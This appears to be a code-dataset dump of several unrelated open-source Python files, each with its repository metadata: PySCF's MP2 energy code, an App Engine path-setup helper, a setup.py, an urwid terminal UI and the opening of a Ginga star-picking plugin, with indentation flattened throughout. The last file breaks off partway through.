def emp2(self):
return self.e_corr
@property
def e_tot(self):
return (self.e_hf or self._scf.e_tot) + self.e_corr
def kernel(self, mo_energy=None, mo_coeff=None, eris=None, with_t2=WITH_T2):
'''
Args:
with_t2 : bool
Whether to generate and hold t2 amplitudes in memory.
'''
if self.verbose >= logger.WARN:
self.check_sanity()
self.dump_flags()
if eris is None:
eris = self.ao2mo(self.mo_coeff)
self.e_hf = getattr(eris, 'e_hf', None)
if self.e_hf is None:
self.e_hf = self._scf.e_tot
if self._scf.converged:
self.e_corr, self.t2 = self.init_amps(mo_energy, mo_coeff, eris, with_t2)
else:
self.converged, self.e_corr, self.t2 = _iterative_kernel(self, eris)
self._finalize()
return self.e_corr, self.t2
def _finalize(self):
'''Hook for dumping results and clearing up the object.'''
logger.note(self, 'E(%s) = %.15g E_corr = %.15g',
self.__class__.__name__, self.e_tot, self.e_corr)
return self
def ao2mo(self, mo_coeff=None):
return _make_eris(self, mo_coeff, verbose=self.verbose)
make_rdm1 = make_rdm1
make_rdm2 = make_rdm2
as_scanner = as_scanner
def density_fit(self, auxbasis=None, with_df=None):
from pyscf.mp import dfmp2
mymp = dfmp2.DFMP2(self._scf, self.frozen, self.mo_coeff, self.mo_occ)
if with_df is not None:
mymp.with_df = with_df
if mymp.with_df.auxbasis != auxbasis:
mymp.with_df = copy.copy(mymp.with_df)
mymp.with_df.auxbasis = auxbasis
return mymp
def nuc_grad_method(self):
from pyscf.grad import mp2
return mp2.Gradients(self)
# For non-canonical MP2
energy = energy
update_amps = update_amps
def init_amps(self, mo_energy=None, mo_coeff=None, eris=None, with_t2=WITH_T2):
return kernel(self, mo_energy, mo_coeff, eris, with_t2)
RMP2 = MP2
from pyscf import scf
scf.hf.RHF.MP2 = lib.class_as_method(MP2)
scf.rohf.ROHF.MP2 = None
def _mo_energy_without_core(mp, mo_energy):
return mo_energy[get_frozen_mask(mp)]
def _mo_without_core(mp, mo):
return mo[:,get_frozen_mask(mp)]
def _mem_usage(nocc, nvir):
nmo = nocc + nvir
basic = ((nocc*nvir)**2 + nocc*nvir**2*2)*8 / 1e6
incore = nocc*nvir*nmo**2/2*8 / 1e6 + basic
outcore = basic
return incore, outcore, basic
#TODO: Merge this _ChemistsERIs class with ccsd._ChemistsERIs class
class _ChemistsERIs:
def __init__(self, mol=None):
self.mol = mol
self.mo_coeff = None
self.nocc = None
self.fock = None
self.e_hf = None
self.orbspin = None
self.ovov = None
def _common_init_(self, mp, mo_coeff=None):
if mo_coeff is None:
mo_coeff = mp.mo_coeff
if mo_coeff is None:
raise RuntimeError('mo_coeff, mo_energy are not initialized.\n'
'You may need to call mf.kernel() to generate them.')
self.mo_coeff = _mo_without_core(mp, mo_coeff)
self.mol = mp.mol
if mo_coeff is mp._scf.mo_coeff and mp._scf.converged:
# The canonical MP2 from a converged SCF result. Rebuilding fock
# and e_hf can be skipped
self.mo_energy = _mo_energy_without_core(mp, mp._scf.mo_energy)
self.fock = numpy.diag(self.mo_energy)
self.e_hf = mp._scf.e_tot
else:
dm = mp._scf.make_rdm1(mo_coeff, mp.mo_occ)
vhf = mp._scf.get_veff(mp.mol, dm)
fockao = mp._scf.get_fock(vhf=vhf, dm=dm)
self.fock = self.mo_coeff.conj().T.dot(fockao).dot(self.mo_coeff)
self.e_hf = mp._scf.energy_tot(dm=dm, vhf=vhf)
self.mo_energy = self.fock.diagonal().real
return self
def _make_eris(mp, mo_coeff=None, ao2mofn=None, verbose=None):
log = logger.new_logger(mp, verbose)
time0 = (time.clock(), time.time())
eris = _ChemistsERIs()
eris._common_init_(mp, mo_coeff)
mo_coeff = eris.mo_coeff
nocc = mp.nocc
nmo = mp.nmo
nvir = nmo - nocc
mem_incore, mem_outcore, mem_basic = _mem_usage(nocc, nvir)
mem_now = lib.current_memory()[0]
max_memory = max(0, mp.max_memory - mem_now)
if max_memory < mem_basic:
log.warn('Not enough memory for integral transformation. '
'Available mem %s MB, required mem %s MB',
max_memory, mem_basic)
co = numpy.asarray(mo_coeff[:,:nocc], order='F')
cv = numpy.asarray(mo_coeff[:,nocc:], order='F')
if (mp.mol.incore_anyway or
(mp._scf._eri is not None and mem_incore < max_memory)):
log.debug('transform (ia|jb) incore')
if callable(ao2mofn):
eris.ovov = ao2mofn((co,cv,co,cv)).reshape(nocc*nvir,nocc*nvir)
else:
eris.ovov = ao2mo.general(mp._scf._eri, (co,cv,co,cv))
elif getattr(mp._scf, 'with_df', None):
# To handle the PBC or custom 2-electron with 3-index tensor.
# Call dfmp2.MP2 for efficient DF-MP2 implementation.
log.warn('DF-HF is found. (ia|jb) is computed based on the DF '
'3-tensor integrals.\n'
'You can switch to dfmp2.MP2 for better performance')
log.debug('transform (ia|jb) with_df')
eris.ovov = mp._scf.with_df.ao2mo((co,cv,co,cv))
else:
log.debug('transform (ia|jb) outcore')
eris.feri = lib.H5TmpFile()
#ao2mo.outcore.general(mp.mol, (co,cv,co,cv), eris.feri,
# max_memory=max_memory, verbose=log)
#eris.ovov = eris.feri['eri_mo']
eris.ovov = _ao2mo_ovov(mp, co, cv, eris.feri, max(2000, max_memory), log)
time1 = log.timer('Integral transformation', *time0)
return eris
#
# the MO integral for MP2 is (ov|ov). This is the efficient integral
# (ij|kl) => (ij|ol) => (ol|ij) => (ol|oj) => (ol|ov) => (ov|ov)
# or => (ij|ol) => (oj|ol) => (oj|ov) => (ov|ov)
#
def _ao2mo_ovov(mp, orbo, orbv, feri, max_memory=2000, verbose=None):
time0 = (time.clock(), time.time())
log = logger.new_logger(mp, verbose)
mol = mp.mol
int2e = mol._add_suffix('int2e')
ao2mopt = _ao2mo.AO2MOpt(mol, int2e, 'CVHFnr_schwarz_cond',
'CVHFsetnr_direct_scf')
nao, nocc = orbo.shape
nvir = orbv.shape[1]
nbas = mol.nbas
assert(nvir <= nao)
ao_loc = mol.ao_loc_nr()
dmax = max(4, min(nao/3, numpy.sqrt(max_memory*.95e6/8/(nao+nocc)**2)))
sh_ranges = ao2mo.outcore.balance_partition(ao_loc, dmax)
dmax = max(x[2] for x in sh_ranges)
eribuf = numpy.empty((nao,dmax,dmax,nao))
ftmp = lib.H5TmpFile()
log.debug('max_memory %s MB (dmax = %s) required disk space %g MB',
max_memory, dmax, nocc**2*(nao*(nao+dmax)/2+nvir**2)*8/1e6)
buf_i = numpy.empty((nocc*dmax**2*nao))
buf_li = numpy.empty((nocc**2*dmax**2))
buf1 = numpy.empty_like(buf_li)
fint = gto.moleintor.getints4c
jk_blk_slices = []
count = 0
time1 = time0
with lib.call_in_background(ftmp.__setitem__) as save:
for ip, (ish0, ish1, ni) in enumerate(sh_ranges):
for jsh0, jsh1, nj in sh_ranges[:ip+1]:
i0, i1 = ao_loc[ish0], ao_loc[ish1]
j0, j1 = ao_loc[jsh0], ao_loc[jsh1]
jk_blk_slices.append((i0,i1,j0,j1))
eri = fint(int2e, mol._atm, mol._bas, mol._env,
shls_slice=(0,nbas,ish0,ish1, jsh0,jsh1,0,nbas),
aosym='s1', ao_loc=ao_loc, cintopt=ao2mopt._cintopt,
out=eribuf)
tmp_i = numpy.ndarray((nocc,(i1-i0)*(j1-j0)*nao), buffer=buf_i)
tmp_li = numpy.ndarray((nocc,nocc*(i1-i0)*(j1-j0)), buffer=buf_li)
lib.ddot(orbo.T, eri.reshape(nao,(i1-i0)*(j1-j0)*nao), c=tmp_i)
lib.ddot(orbo.T, tmp_i.reshape(nocc*(i1-i0)*(j1-j0),nao).T, c=tmp_li)
tmp_li = tmp_li.reshape(nocc,nocc,(i1-i0),(j1-j0))
save(str(count), tmp_li.transpose(1,0,2,3))
buf_li, buf1 = buf1, buf_li
count += 1
time1 = log.timer_debug1('partial ao2mo [%d:%d,%d:%d]' %
(ish0,ish1,jsh0,jsh1), *time1)
time1 = time0 = log.timer('mp2 ao2mo_ovov pass1', *time0)
eri = eribuf = tmp_i = tmp_li = buf_i = buf_li = buf1 = None
h5dat = feri.create_dataset('ovov', (nocc*nvir,nocc*nvir), 'f8',
chunks=(nvir,nvir))
occblk = int(min(nocc, max(4, 250/nocc, max_memory*.9e6/8/(nao**2*nocc)/5)))
def load(i0, eri):
if i0 < nocc:
i1 = min(i0+occblk, nocc)
for k, (p0,p1,q0,q1) in enumerate(jk_blk_slices):
eri[:i1-i0,:,p0:p1,q0:q1] = ftmp[str(k)][i0:i1]
if p0 != q0:
dat = numpy.asarray(ftmp[str(k)][:,i0:i1])
eri[:i1-i0,:,q0:q1,p0:p1] = dat.transpose(1,0,3,2)
def save(i0, i1, dat):
for i in range(i0, i1):
h5dat[i*nvir:(i+1)*nvir] = dat[i-i0].reshape(nvir,nocc*nvir)
orbv = numpy.asarray(orbv, order='F')
buf_prefecth = numpy.empty((occblk,nocc,nao,nao))
buf = numpy.empty_like(buf_prefecth)
bufw = numpy.empty((occblk*nocc,nvir**2))
bufw1 = numpy.empty_like(bufw)
with lib.call_in_background(load) as prefetch:
with lib.call_in_background(save) as bsave:
load(0, buf_prefecth)
for i0, i1 in lib.prange(0, nocc, occblk):
buf, buf_prefecth = buf_prefecth, buf
prefetch(i1, buf_prefecth)
eri = buf[:i1-i0].reshape((i1-i0)*nocc,nao,nao)
dat = _ao2mo.nr_e2(eri, orbv, (0,nvir,0,nvir), 's1', 's1', out=bufw)
bsave(i0, i1, dat.reshape(i1-i0,nocc,nvir,nvir).transpose(0,2,1,3))
bufw, bufw1 = bufw1, bufw
time1 = log.timer_debug1('pass2 ao2mo [%d:%d]' % (i0,i1), *time1)
time0 = log.timer('mp2 ao2mo_ovov pass2', *time0)
return h5dat
del(WITH_T2)
if __name__ == '__main__':
from pyscf import scf
from pyscf import gto
mol = gto.Mole()
mol.atom = [
[8 , (0. , 0. , 0.)],
[1 , (0. , -0.757 , 0.587)],
[1 , (0. , 0.757 , 0.587)]]
mol.basis = 'cc-pvdz'
mol.build()
mf = scf.RHF(mol).run()
pt = MP2(mf)
emp2, t2 = pt.kernel()
print(emp2 - -0.204019967288338)
pt.max_memory = 1
emp2, t2 = pt.kernel()
print(emp2 - -0.204019967288338)
pt = MP2(scf.density_fit(mf, 'weigend'))
print(pt.kernel()[0] - -0.204254500454)
mf = scf.RHF(mol).run(max_cycle=1)
pt = MP2(mf)
print(pt.kernel()[0] - -0.204479914961218)
|
gkc1000/pyscf
|
pyscf/mp/mp2.py
|
Python
|
apache-2.0
| 27,343
|
[
"PySCF"
] |
810f671986c21ae5a3f406adf2b051591d464a9fcf0d6c3680627823ae5deb87
|
# -*- coding: utf-8 -*-
import os, sys
COMMON_DIR = os.path.abspath(os.path.dirname(os.path.dirname(__file__)))
PROJECT_DIR = os.path.dirname(COMMON_DIR)
ZIP_PACKAGES_DIRS = (os.path.join(PROJECT_DIR, 'zip-packages'),
os.path.join(COMMON_DIR, 'zip-packages'))
# Overrides for os.environ
env_ext = {'DJANGO_SETTINGS_MODULE': 'settings'}
def setup_env(manage_py_env=False):
"""Configures app engine environment for command-line apps."""
# Try to import the appengine code from the system path.
try:
from google.appengine.api import apiproxy_stub_map
except ImportError, e:
for k in [k for k in sys.modules if k.startswith('google')]:
del sys.modules[k]
# Not on the system path. Build a list of alternative paths where it
# may be. First look within the project for a local copy, then look for
# where the Mac OS SDK installs it.
paths = [os.path.join(COMMON_DIR, '.google_appengine'),
'/usr/local/google_appengine',
'/Applications/GoogleAppEngineLauncher.app/Contents/Resources/GoogleAppEngine-default.bundle/Contents/Resources/google_appengine']
for path in os.environ.get('PATH', '').replace(';', ':').split(':'):
path = path.rstrip(os.sep)
if path.endswith('google_appengine'):
paths.append(path)
if os.name in ('nt', 'dos'):
prefix = '%(PROGRAMFILES)s' % os.environ
paths.append(prefix + r'\Google\google_appengine')
# Loop through all possible paths and look for the SDK dir.
SDK_PATH = None
for sdk_path in paths:
sdk_path = os.path.realpath(sdk_path)
if os.path.exists(sdk_path):
SDK_PATH = sdk_path
break
if SDK_PATH is None:
# The SDK could not be found in any known location.
sys.stderr.write('The Google App Engine SDK could not be found!\n'
'Visit http://code.google.com/p/app-engine-patch/'
' for installation instructions.\n')
sys.exit(1)
# Add the SDK and the libraries within it to the system path.
EXTRA_PATHS = [SDK_PATH]
lib = os.path.join(SDK_PATH, 'lib')
# Automatically add all packages in the SDK's lib folder:
for dir in os.listdir(lib):
path = os.path.join(lib, dir)
# Package can be under 'lib/<pkg>/<pkg>/' or 'lib/<pkg>/lib/<pkg>/'
detect = (os.path.join(path, dir), os.path.join(path, 'lib', dir))
for path in detect:
if os.path.isdir(path):
EXTRA_PATHS.append(os.path.dirname(path))
break
sys.path = EXTRA_PATHS + sys.path
from google.appengine.api import apiproxy_stub_map
# Add this folder to sys.path
sys.path = [os.path.abspath(os.path.dirname(__file__))] + sys.path
setup_project()
from appenginepatcher.patch import patch_all
patch_all()
if not manage_py_env:
return
print >> sys.stderr, 'Running on app-engine-patch 1.0.2.2'
def setup_project():
from appenginepatcher import on_production_server
if on_production_server:
# This fixes a pwd import bug for os.path.expanduser()
global env_ext
env_ext['HOME'] = PROJECT_DIR
os.environ.update(env_ext)
# Add the two parent folders and appenginepatcher's lib folder to sys.path.
# The current folder has to be added in main.py or setup_env(). This
# suggests a folder structure where you separate reusable code from project
# code:
# project -> common -> appenginepatch
# You can put a custom Django version into the "common" folder, for example.
EXTRA_PATHS = [
PROJECT_DIR,
COMMON_DIR,
]
this_folder = os.path.abspath(os.path.dirname(__file__))
EXTRA_PATHS.append(os.path.join(this_folder, 'appenginepatcher', 'lib'))
# We support zipped packages in the common and project folders.
# The files must be in the packages folder.
for packages_dir in ZIP_PACKAGES_DIRS:
if os.path.isdir(packages_dir):
for zip_package in os.listdir(packages_dir):
EXTRA_PATHS.append(os.path.join(packages_dir, zip_package))
# App Engine causes main.py to be reloaded if an exception gets raised
# on the first request of a main.py instance, so don't call setup_project()
# multiple times. We ensure this indirectly by checking if we've already
# modified sys.path.
if len(sys.path) < len(EXTRA_PATHS) or \
sys.path[:len(EXTRA_PATHS)] != EXTRA_PATHS:
# Remove the standard version of Django
for k in [k for k in sys.modules if k.startswith('django')]:
del sys.modules[k]
sys.path = EXTRA_PATHS + sys.path
|
gogogo/gogogo-hk
|
common/appenginepatch/aecmd.py
|
Python
|
agpl-3.0
| 4,878
|
[
"VisIt"
] |
0be37498774de88152bf6fa41b8e396c7c932c405bdb5069fd87b77dd3331994
|
"""A setuptools based setup module.
See:
https://packaging.python.org/en/latest/distributing.html
https://github.com/pypa/sampleproject
"""
# Always prefer setuptools over distutils
from setuptools import setup, find_packages
# To use a consistent encoding
from codecs import open
from os import path
here = path.abspath(path.dirname(__file__))
# Get the long description from the README file
with open(path.join(here, 'README.md'), encoding='utf-8') as f:
long_description = f.read()
# Get the testing requirements from testing-requirements.txt
with open(path.join(here, 'testing-requirements.txt')) as f:
test_reqs = f.read().splitlines()
setup(
name='acceptanceutils',
# Versions should comply with PEP440. For a discussion on single-sourcing
# the version across setup.py and the project code, see
# https://packaging.python.org/en/latest/single_source_version.html
version='0.1.2',
description='Generic acceptance testing utils.',
long_description=long_description,
# The project's main homepage.
url='https://github.com/Brian-Williams/acceptanceutils',
# Author details
author='Brian Williams',
author_email='briancmwilliams@gmail.com',
# Choose your license
license='MIT',
# See https://pypi.python.org/pypi?%3Aaction=list_classifiers
classifiers=[
# How mature is this project? Common values are
# 3 - Alpha
# 4 - Beta
# 5 - Production/Stable
'Development Status :: 3 - Alpha',
# Indicate who your project is intended for
'Intended Audience :: Developers',
'Topic :: Software Development :: Build Tools',
# Pick your license as you wish (should match "license" above)
'License :: OSI Approved :: MIT License',
# Specify the Python versions you support here. In particular, ensure
# that you indicate whether you support Python 2, Python 3 or both.
'Programming Language :: Python :: 2',
'Programming Language :: Python :: 2.7',
'Programming Language :: Python :: 3',
'Programming Language :: Python :: 3.5',
'Programming Language :: Python :: Implementation :: PyPy',
],
# What does your project relate to?
keywords='testing acceptance',
# You can just specify the packages manually here if your project is
# simple. Or you can use find_packages().
packages=find_packages(),
# Alternatively, if you want to distribute just a my_module.py, uncomment
# this:
# py_modules=["my_module"],
# List run-time dependencies here. These will be installed by pip when
# your project is installed. For an analysis of "install_requires" vs pip's
# requirements files see:
# https://packaging.python.org/en/latest/requirements.html
install_requires=[],
# List additional groups of dependencies here (e.g. development
# dependencies). You can install these using the following syntax,
# for example:
# $ pip install -e .[dev,test]
extras_require={
'test': list(test_reqs),
},
# If there are data files included in your packages that need to be
# installed, specify them here. If using Python 2.6 or less, then these
# have to be included in MANIFEST.in as well.
# package_data={
# 'sample': ['package_data.dat'],
# },
# Although 'package_data' is the preferred approach, in some case you may
# need to place data files outside of your packages. See:
# http://docs.python.org/3.4/distutils/setupscript.html#installing-additional-files # noqa
# In this case, 'data_file' will be installed into '<sys.prefix>/my_data'
# data_files=[('my_data', ['data/data_file'])],
# To provide executable scripts, use entry points in preference to the
# "scripts" keyword. Entry points provide cross-platform support and allow
# pip to create the appropriate form of executable for the target platform.
# entry_points={
# 'console_scripts': [
# 'sample=sample:main',
# ],
# },
)
|
Brian-Williams/acceptanceutils
|
setup.py
|
Python
|
mit
| 4,079
|
[
"Brian"
] |
922821e6c48ecbbbb4b908dab021ffa2832a56bcfbc046dab48c6ab04f587e94
|
"""Urwid framework shamelessly lifted from:
https://github.com/izderadicka/xmpp-tester/blob/master/commander.py
To be fair, I cleaned it up and added comments, so it's not all gank. ;)"""
# pylint: disable=too-many-instance-attributes, too-few-public-methods, invalid-name, too-many-arguments
from collections import deque
import threading
import urwid
class UnknownCommand(Exception):
"""Generic unknown command handler."""
def __init__(self, cmd):
Exception.__init__(self, 'Unknown command: %s' %cmd)
class Interaction(object):
"""Base class that handles interactions with the Terminal."""
def __init__(self):
"""Set up basic help and quit capabilites."""
# Just like IRC except without a prefix slash. :P
self._quit_cmd = ['quit', 'q']
self._help_cmd = ['help', '?']
def __call__(self, line):
tokens = line.split()
cmd = tokens[0].lower()
args = tokens[1:]
if cmd in self._quit_cmd:
return Terminal.Exit
elif cmd in self._help_cmd:
return self.help(args[0] if args else None)
elif hasattr(self, 'do_'+cmd):
return getattr(self, 'do_'+cmd)(*args)
else:
raise UnknownCommand(cmd)
def help(self, cmd=None):
"""Socorro!"""
def std_help():
"""Rudimentary help text."""
qc = '|'.join(self._quit_cmd)
hc = '|'.join(self._help_cmd)
res = 'Type [%s] command_name to get more help.\n' % hc
res += 'Type [%s] to quit.\n' % qc
cl = [name[3:] for name in dir(self) if name.startswith('do_') and len(name) > 3]
res += 'Available commands: %s' %(' '.join(sorted(cl)))
return res
if not cmd:
return std_help()
else:
try:
fn = getattr(self, 'do_' + cmd)
doc = fn.__doc__
return doc or 'No documentation available for %s' %cmd
except AttributeError:
return std_help()
class FocusMixin(object):
"""Make a stab at mouse support, because why not?"""
def mouse_event(self, size, event, button, x, y, focus):
"""Une souris verte, qui courait dans l'herbe..."""
if focus and hasattr(self, '_got_focus') and self._got_focus:
self._got_focus()
return super(FocusMixin, self).mouse_event(size, event, button, x, y, focus)
class ListView(FocusMixin, urwid.ListBox):
"""This is how lines of text actually get displayed."""
def __init__(self, model, got_focus, max_size=None):
urwid.ListBox.__init__(self, model)
self._got_focus = got_focus
self.max_size = max_size
self._lock = threading.Lock()
def add(self, line):
"""Add (display) a line of text."""
with self._lock: # pylint: disable=not-context-manager
was_on_end = self.get_focus()[1] == len(self.body)-1
if self.max_size and len(self.body) > self.max_size:
del self.body[0]
self.body.append(urwid.Text(line))
last = len(self.body) - 1
if was_on_end:
self.set_focus(last, 'above')
class Input(FocusMixin, urwid.Edit):
"""Put the means of production into the hands of the worker."""
signals = ['line_entered']
def __init__(self, got_focus=None):
"""Provide a scrollable command history (up/down arrows)."""
urwid.Edit.__init__(self)
self.history = deque(maxlen=100)
self._history_index = -1
self._got_focus = got_focus
def keypress(self, size, key):
"""Deal with *single* keypresses."""
if key == 'enter':
line = self.edit_text.strip()
if line:
urwid.emit_signal(self, 'line_entered', line)
self.history.append(line)
self._history_index = len(self.history)
self.edit_text = u''
if key == 'up':
self._history_index -= 1
if self._history_index < 0:
self._history_index = 0
else:
self.edit_text = self.history[self._history_index]
if key == 'down':
self._history_index += 1
if self._history_index >= len(self.history):
self._history_index = len(self.history)
self.edit_text = u''
else:
self.edit_text = self.history[self._history_index]
else:
urwid.Edit.keypress(self, size, key)
class Terminal(urwid.Frame):
"""Simple terminal UI."""
# colours
PALLETE = [('reversed', urwid.BLACK, urwid.LIGHT_GRAY),
('normal', urwid.LIGHT_GRAY, urwid.BLACK),
('error', urwid.LIGHT_RED, urwid.BLACK),
('green', urwid.DARK_GREEN, urwid.BLACK),
('blue', urwid.LIGHT_BLUE, urwid.BLACK),
('magenta', urwid.DARK_MAGENTA, urwid.BLACK)]
class Exit(object):
"""Brexit means brexit."""
pass
def __init__(self, title='', cap='', cmd=None, max_size=100):
"""init."""
self.header = urwid.Text(title)
self.model = urwid.SimpleListWalker([])
self.body = ListView(self.model, lambda: self._update_focus(False), max_size=max_size)
self.input = Input(lambda: self._update_focus(True))
footer = urwid.Pile(
[urwid.AttrMap(urwid.Text(cap), 'reversed'),
urwid.AttrMap(self.input, 'normal')]
)
urwid.Frame.__init__(
self,
urwid.AttrWrap(self.body, 'normal'),
urwid.AttrWrap(self.header, 'reversed'),
footer
)
self.set_focus_path(['footer', 1])
self._focus = True
urwid.connect_signal(
self.input,
'line_entered',
self.on_line_entered
)
self._cmd = cmd
self._output_styles = [s[0] for s in self.PALLETE]
self.eloop = None
def loop(self, handle_mouse=False):
"""Threads are exciting!"""
self.eloop = urwid.MainLoop(self, self.PALLETE, handle_mouse=handle_mouse)
self._eloop_thread = threading.current_thread() # pylint: disable=attribute-defined-outside-init
self.eloop.run()
def on_line_entered(self, line):
"""User input!"""
if self._cmd:
try:
res = self._cmd(line)
except Exception, e: #pylint: disable=broad-except
self.output('Error: %s' %e)
return
if res == Terminal.Exit:
raise urwid.ExitMainLoop()
elif res:
self.output(str(res))
else:
self.output(line)
def output(self, line):
"""Write to the screen."""
self.body.add(line)
# I told you threading was exciting!
if self.eloop and self._eloop_thread != threading.current_thread():
self.eloop.draw_screen()
def _update_focus(self, focus):
"""Focus, padawan."""
self._focus = focus
def switch_focus(self):
"""Ooohh a shiny!"""
if self._focus:
self.set_focus('body')
self._focus = False
else:
self.set_focus_path(['footer', 1])
self._focus = True
def keypress(self, size, key):
"""Deal with tab to change between commandline and window."""
if key == 'tab':
self.switch_focus()
return urwid.Frame.keypress(self, size, key)
|
phrawzty/ubunolia
|
turwidal/turwidal.py
|
Python
|
mpl-2.0
| 7,585
|
[
"exciting"
] |
52b74fcd6884c1fc46887e59c9240f1002a9a293519bb5153efd33dd36105942
|
#
# Pick.py -- Pick plugin for Ginga fits viewer
#
# Eric Jeschke (eric@naoj.org)
#
# Copyright (c) Eric R. Jeschke. All rights reserved.
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
import threading
import numpy
import time
import os.path
from ginga.misc import Widgets, CanvasTypes, Bunch
from ginga.util import iqcalc, wcs
from ginga import GingaPlugin
from ginga.util.six.moves import map, zip, filter
try:
from ginga.misc import Plot
have_mpl = True
except ImportError:
have_mpl = False
region_default_width = 30
region_default_height = 30
class Pick(GingaPlugin.LocalPlugin):
def __init__(self, fv, fitsimage):
# superclass defines some variables for us, like logger
super(Pick, self).__init__(fv, fitsimage)
self.layertag = 'pick-canvas'
self.pickimage = None
self.pickcenter = None
self.pick_qs = None
self.picktag = None
# get Pick preferences
prefs = self.fv.get_preferences()
self.settings = prefs.createCategory('plugin_Pick')
self.settings.load(onError='silent')
self.sync_preferences()
self.pick_x1 = 0
self.pick_y1 = 0
self.pick_data = None
self.pick_log = None
self.dx = region_default_width
self.dy = region_default_height
# For offloading intensive calculation from graphics thread
self.serialnum = 0
self.lock = threading.RLock()
self.lock2 = threading.RLock()
self.ev_intr = threading.Event()
self.last_rpt = {}
self.plot_panx = 0.5
self.plot_pany = 0.5
self.plot_zoomlevel = 1.0
self.contour_data = None
self.iqcalc = iqcalc.IQCalc(self.logger)
self.dc = self.fv.getDrawClasses()
canvas = self.dc.DrawingCanvas()
canvas.enable_draw(True)
canvas.enable_edit(True)
canvas.set_callback('cursor-down', self.btndown)
canvas.set_callback('cursor-move', self.drag)
canvas.set_callback('cursor-up', self.update)
canvas.set_drawtype('rectangle', color='cyan', linestyle='dash',
drawdims=True)
canvas.set_callback('draw-event', self.draw_cb)
canvas.set_callback('edit-event', self.edit_cb)
canvas.setSurface(self.fitsimage)
self.canvas = canvas
self.have_mpl = have_mpl
def sync_preferences(self):
# Load various preferences
self.pickcolor = self.settings.get('color_pick', 'green')
self.candidate_color = self.settings.get('color_candidate', 'purple')
# Peak finding parameters and selection criteria
self.max_side = self.settings.get('max_side', 1024)
self.radius = self.settings.get('radius', 10)
self.threshold = self.settings.get('threshold', None)
self.min_fwhm = self.settings.get('min_fwhm', 2.0)
self.max_fwhm = self.settings.get('max_fwhm', 50.0)
self.min_ellipse = self.settings.get('min_ellipse', 0.5)
self.edgew = self.settings.get('edge_width', 0.01)
self.show_candidates = self.settings.get('show_candidates', False)
# Report in 0- or 1-based coordinates
coord_offset = self.fv.settings.get('pixel_coords_offset', 0.0)
self.pixel_coords_offset = self.settings.get('pixel_coords_offset',
coord_offset)
# For controls
self.delta_sky = self.settings.get('delta_sky', 0.0)
self.delta_bright = self.settings.get('delta_bright', 0.0)
# Formatting for reports
self.do_record = self.settings.get('record_picks', False)
self.rpt_header = self.settings.get('report_header',
"# ra, dec, eq, x, y, fwhm, fwhm_x, fwhm_y, starsize, ellip, bg, sky, bright, time_local, time_ut")
self.rpt_format = self.settings.get('report_format',
"%(ra_deg)f, %(dec_deg)f, %(equinox)6.1f, %(x)f, %(y)f, %(fwhm)f, %(fwhm_x)f, %(fwhm_y)f, %(starsize)f, %(ellipse)f, %(background)f, %(skylevel)f, %(brightness)f, %(time_local)s, %(time_ut)s")
self.do_report_log = self.settings.get('report_to_log', False)
report_log = self.settings.get('report_log_path', None)
if report_log is None:
report_log = "pick_log.txt"
self.report_log = report_log
# For contour plot
self.num_contours = self.settings.get('num_contours', 8)
self.contour_size_limit = self.settings.get('contour_size_limit', 70)
def build_gui(self, container):
assert iqcalc.have_scipy == True, \
Exception("Please install python-scipy to use this plugin")
self.pickcenter = None
vtop = Widgets.VBox()
vtop.set_border_width(4)
vbox, sw, orientation = Widgets.get_oriented_box(container)
vbox.set_border_width(4)
vbox.set_spacing(2)
vpaned = Widgets.Splitter(orientation=orientation)
nb = Widgets.TabWidget(tabpos='bottom')
#nb.set_scrollable(True)
self.w.nb1 = nb
vpaned.add_widget(nb)
cm, im = self.fv.cm, self.fv.im
di = CanvasTypes.ImageViewCanvas(logger=self.logger)
width, height = 200, 200
di.set_desired_size(width, height)
di.enable_autozoom('off')
di.enable_autocuts('off')
di.zoom_to(3, redraw=False)
settings = di.get_settings()
settings.getSetting('zoomlevel').add_callback('set',
self.zoomset, di)
di.set_cmap(cm, redraw=False)
di.set_imap(im, redraw=False)
di.set_callback('none-move', self.detailxy)
di.set_bg(0.4, 0.4, 0.4)
# for debugging
di.set_name('pickimage')
self.pickimage = di
bd = di.get_bindings()
bd.enable_pan(True)
bd.enable_zoom(True)
bd.enable_cuts(True)
iw = Widgets.wrap(di.get_widget())
nb.add_widget(iw, title="Image")
if have_mpl:
self.plot1 = Plot.Plot(logger=self.logger,
width=2, height=3, dpi=72)
self.w.canvas = self.plot1.canvas
self.w.fig = self.plot1.fig
self.w.ax = self.w.fig.add_subplot(111, axisbg='black')
self.w.ax.set_aspect('equal', adjustable='box')
self.w.ax.set_title('Contours')
#self.w.ax.grid(True)
canvas = self.w.canvas
connect = canvas.mpl_connect
# These are not ready for prime time...
# connect("motion_notify_event", self.plot_motion_notify)
# connect("button_press_event", self.plot_button_press)
connect("scroll_event", self.plot_scroll)
nb.add_widget(Widgets.wrap(canvas), title="Contour")
self.plot2 = Plot.Plot(logger=self.logger,
width=2, height=3, dpi=72)
self.w.canvas2 = self.plot2.canvas
self.w.fig2 = self.plot2.fig
self.w.ax2 = self.w.fig2.add_subplot(111, axisbg='white')
#self.w.ax2.set_aspect('equal', adjustable='box')
self.w.ax2.set_ylabel('brightness')
self.w.ax2.set_xlabel('pixels')
self.w.ax2.set_title('FWHM')
self.w.ax.grid(True)
canvas = self.w.canvas2
nb.add_widget(Widgets.wrap(canvas), title="FWHM")
## self.msgFont = self.fv.getFont("sansFont", 12)
## tw = Widgets.TextArea(wrap=True, editable=False)
## tw.set_font(self.msgFont)
## self.tw = tw
## fr = Widgets.Frame("Instructions")
## vbox2 = Widgets.VBox()
## vbox2.add_widget(tw)
## vbox2.add_widget(Widgets.Label(''), stretch=1)
## fr.set_widget(vbox2)
## vbox.add_widget(fr, stretch=0)
vpaned.add_widget(Widgets.Label(''))
vbox.add_widget(vpaned, stretch=1)
fr = Widgets.Frame("Pick")
nb = Widgets.TabWidget(tabpos='bottom')
self.w.nb2 = nb
# Build report panel
captions = (('Zoom:', 'label', 'Zoom', 'llabel',
'Contour Zoom:', 'label', 'Contour Zoom', 'llabel'),
('Object_X', 'label', 'Object_X', 'llabel',
'Object_Y', 'label', 'Object_Y', 'llabel'),
('RA:', 'label', 'RA', 'llabel',
'DEC:', 'label', 'DEC', 'llabel'),
('Equinox:', 'label', 'Equinox', 'llabel',
'Background:', 'label', 'Background', 'llabel'),
('Sky Level:', 'label', 'Sky Level', 'llabel',
'Brightness:', 'label', 'Brightness', 'llabel'),
('FWHM X:', 'label', 'FWHM X', 'llabel',
'FWHM Y:', 'label', 'FWHM Y', 'llabel'),
('FWHM:', 'label', 'FWHM', 'llabel',
'Star Size:', 'label', 'Star Size', 'llabel'),
('Sample Area:', 'label', 'Sample Area', 'llabel',
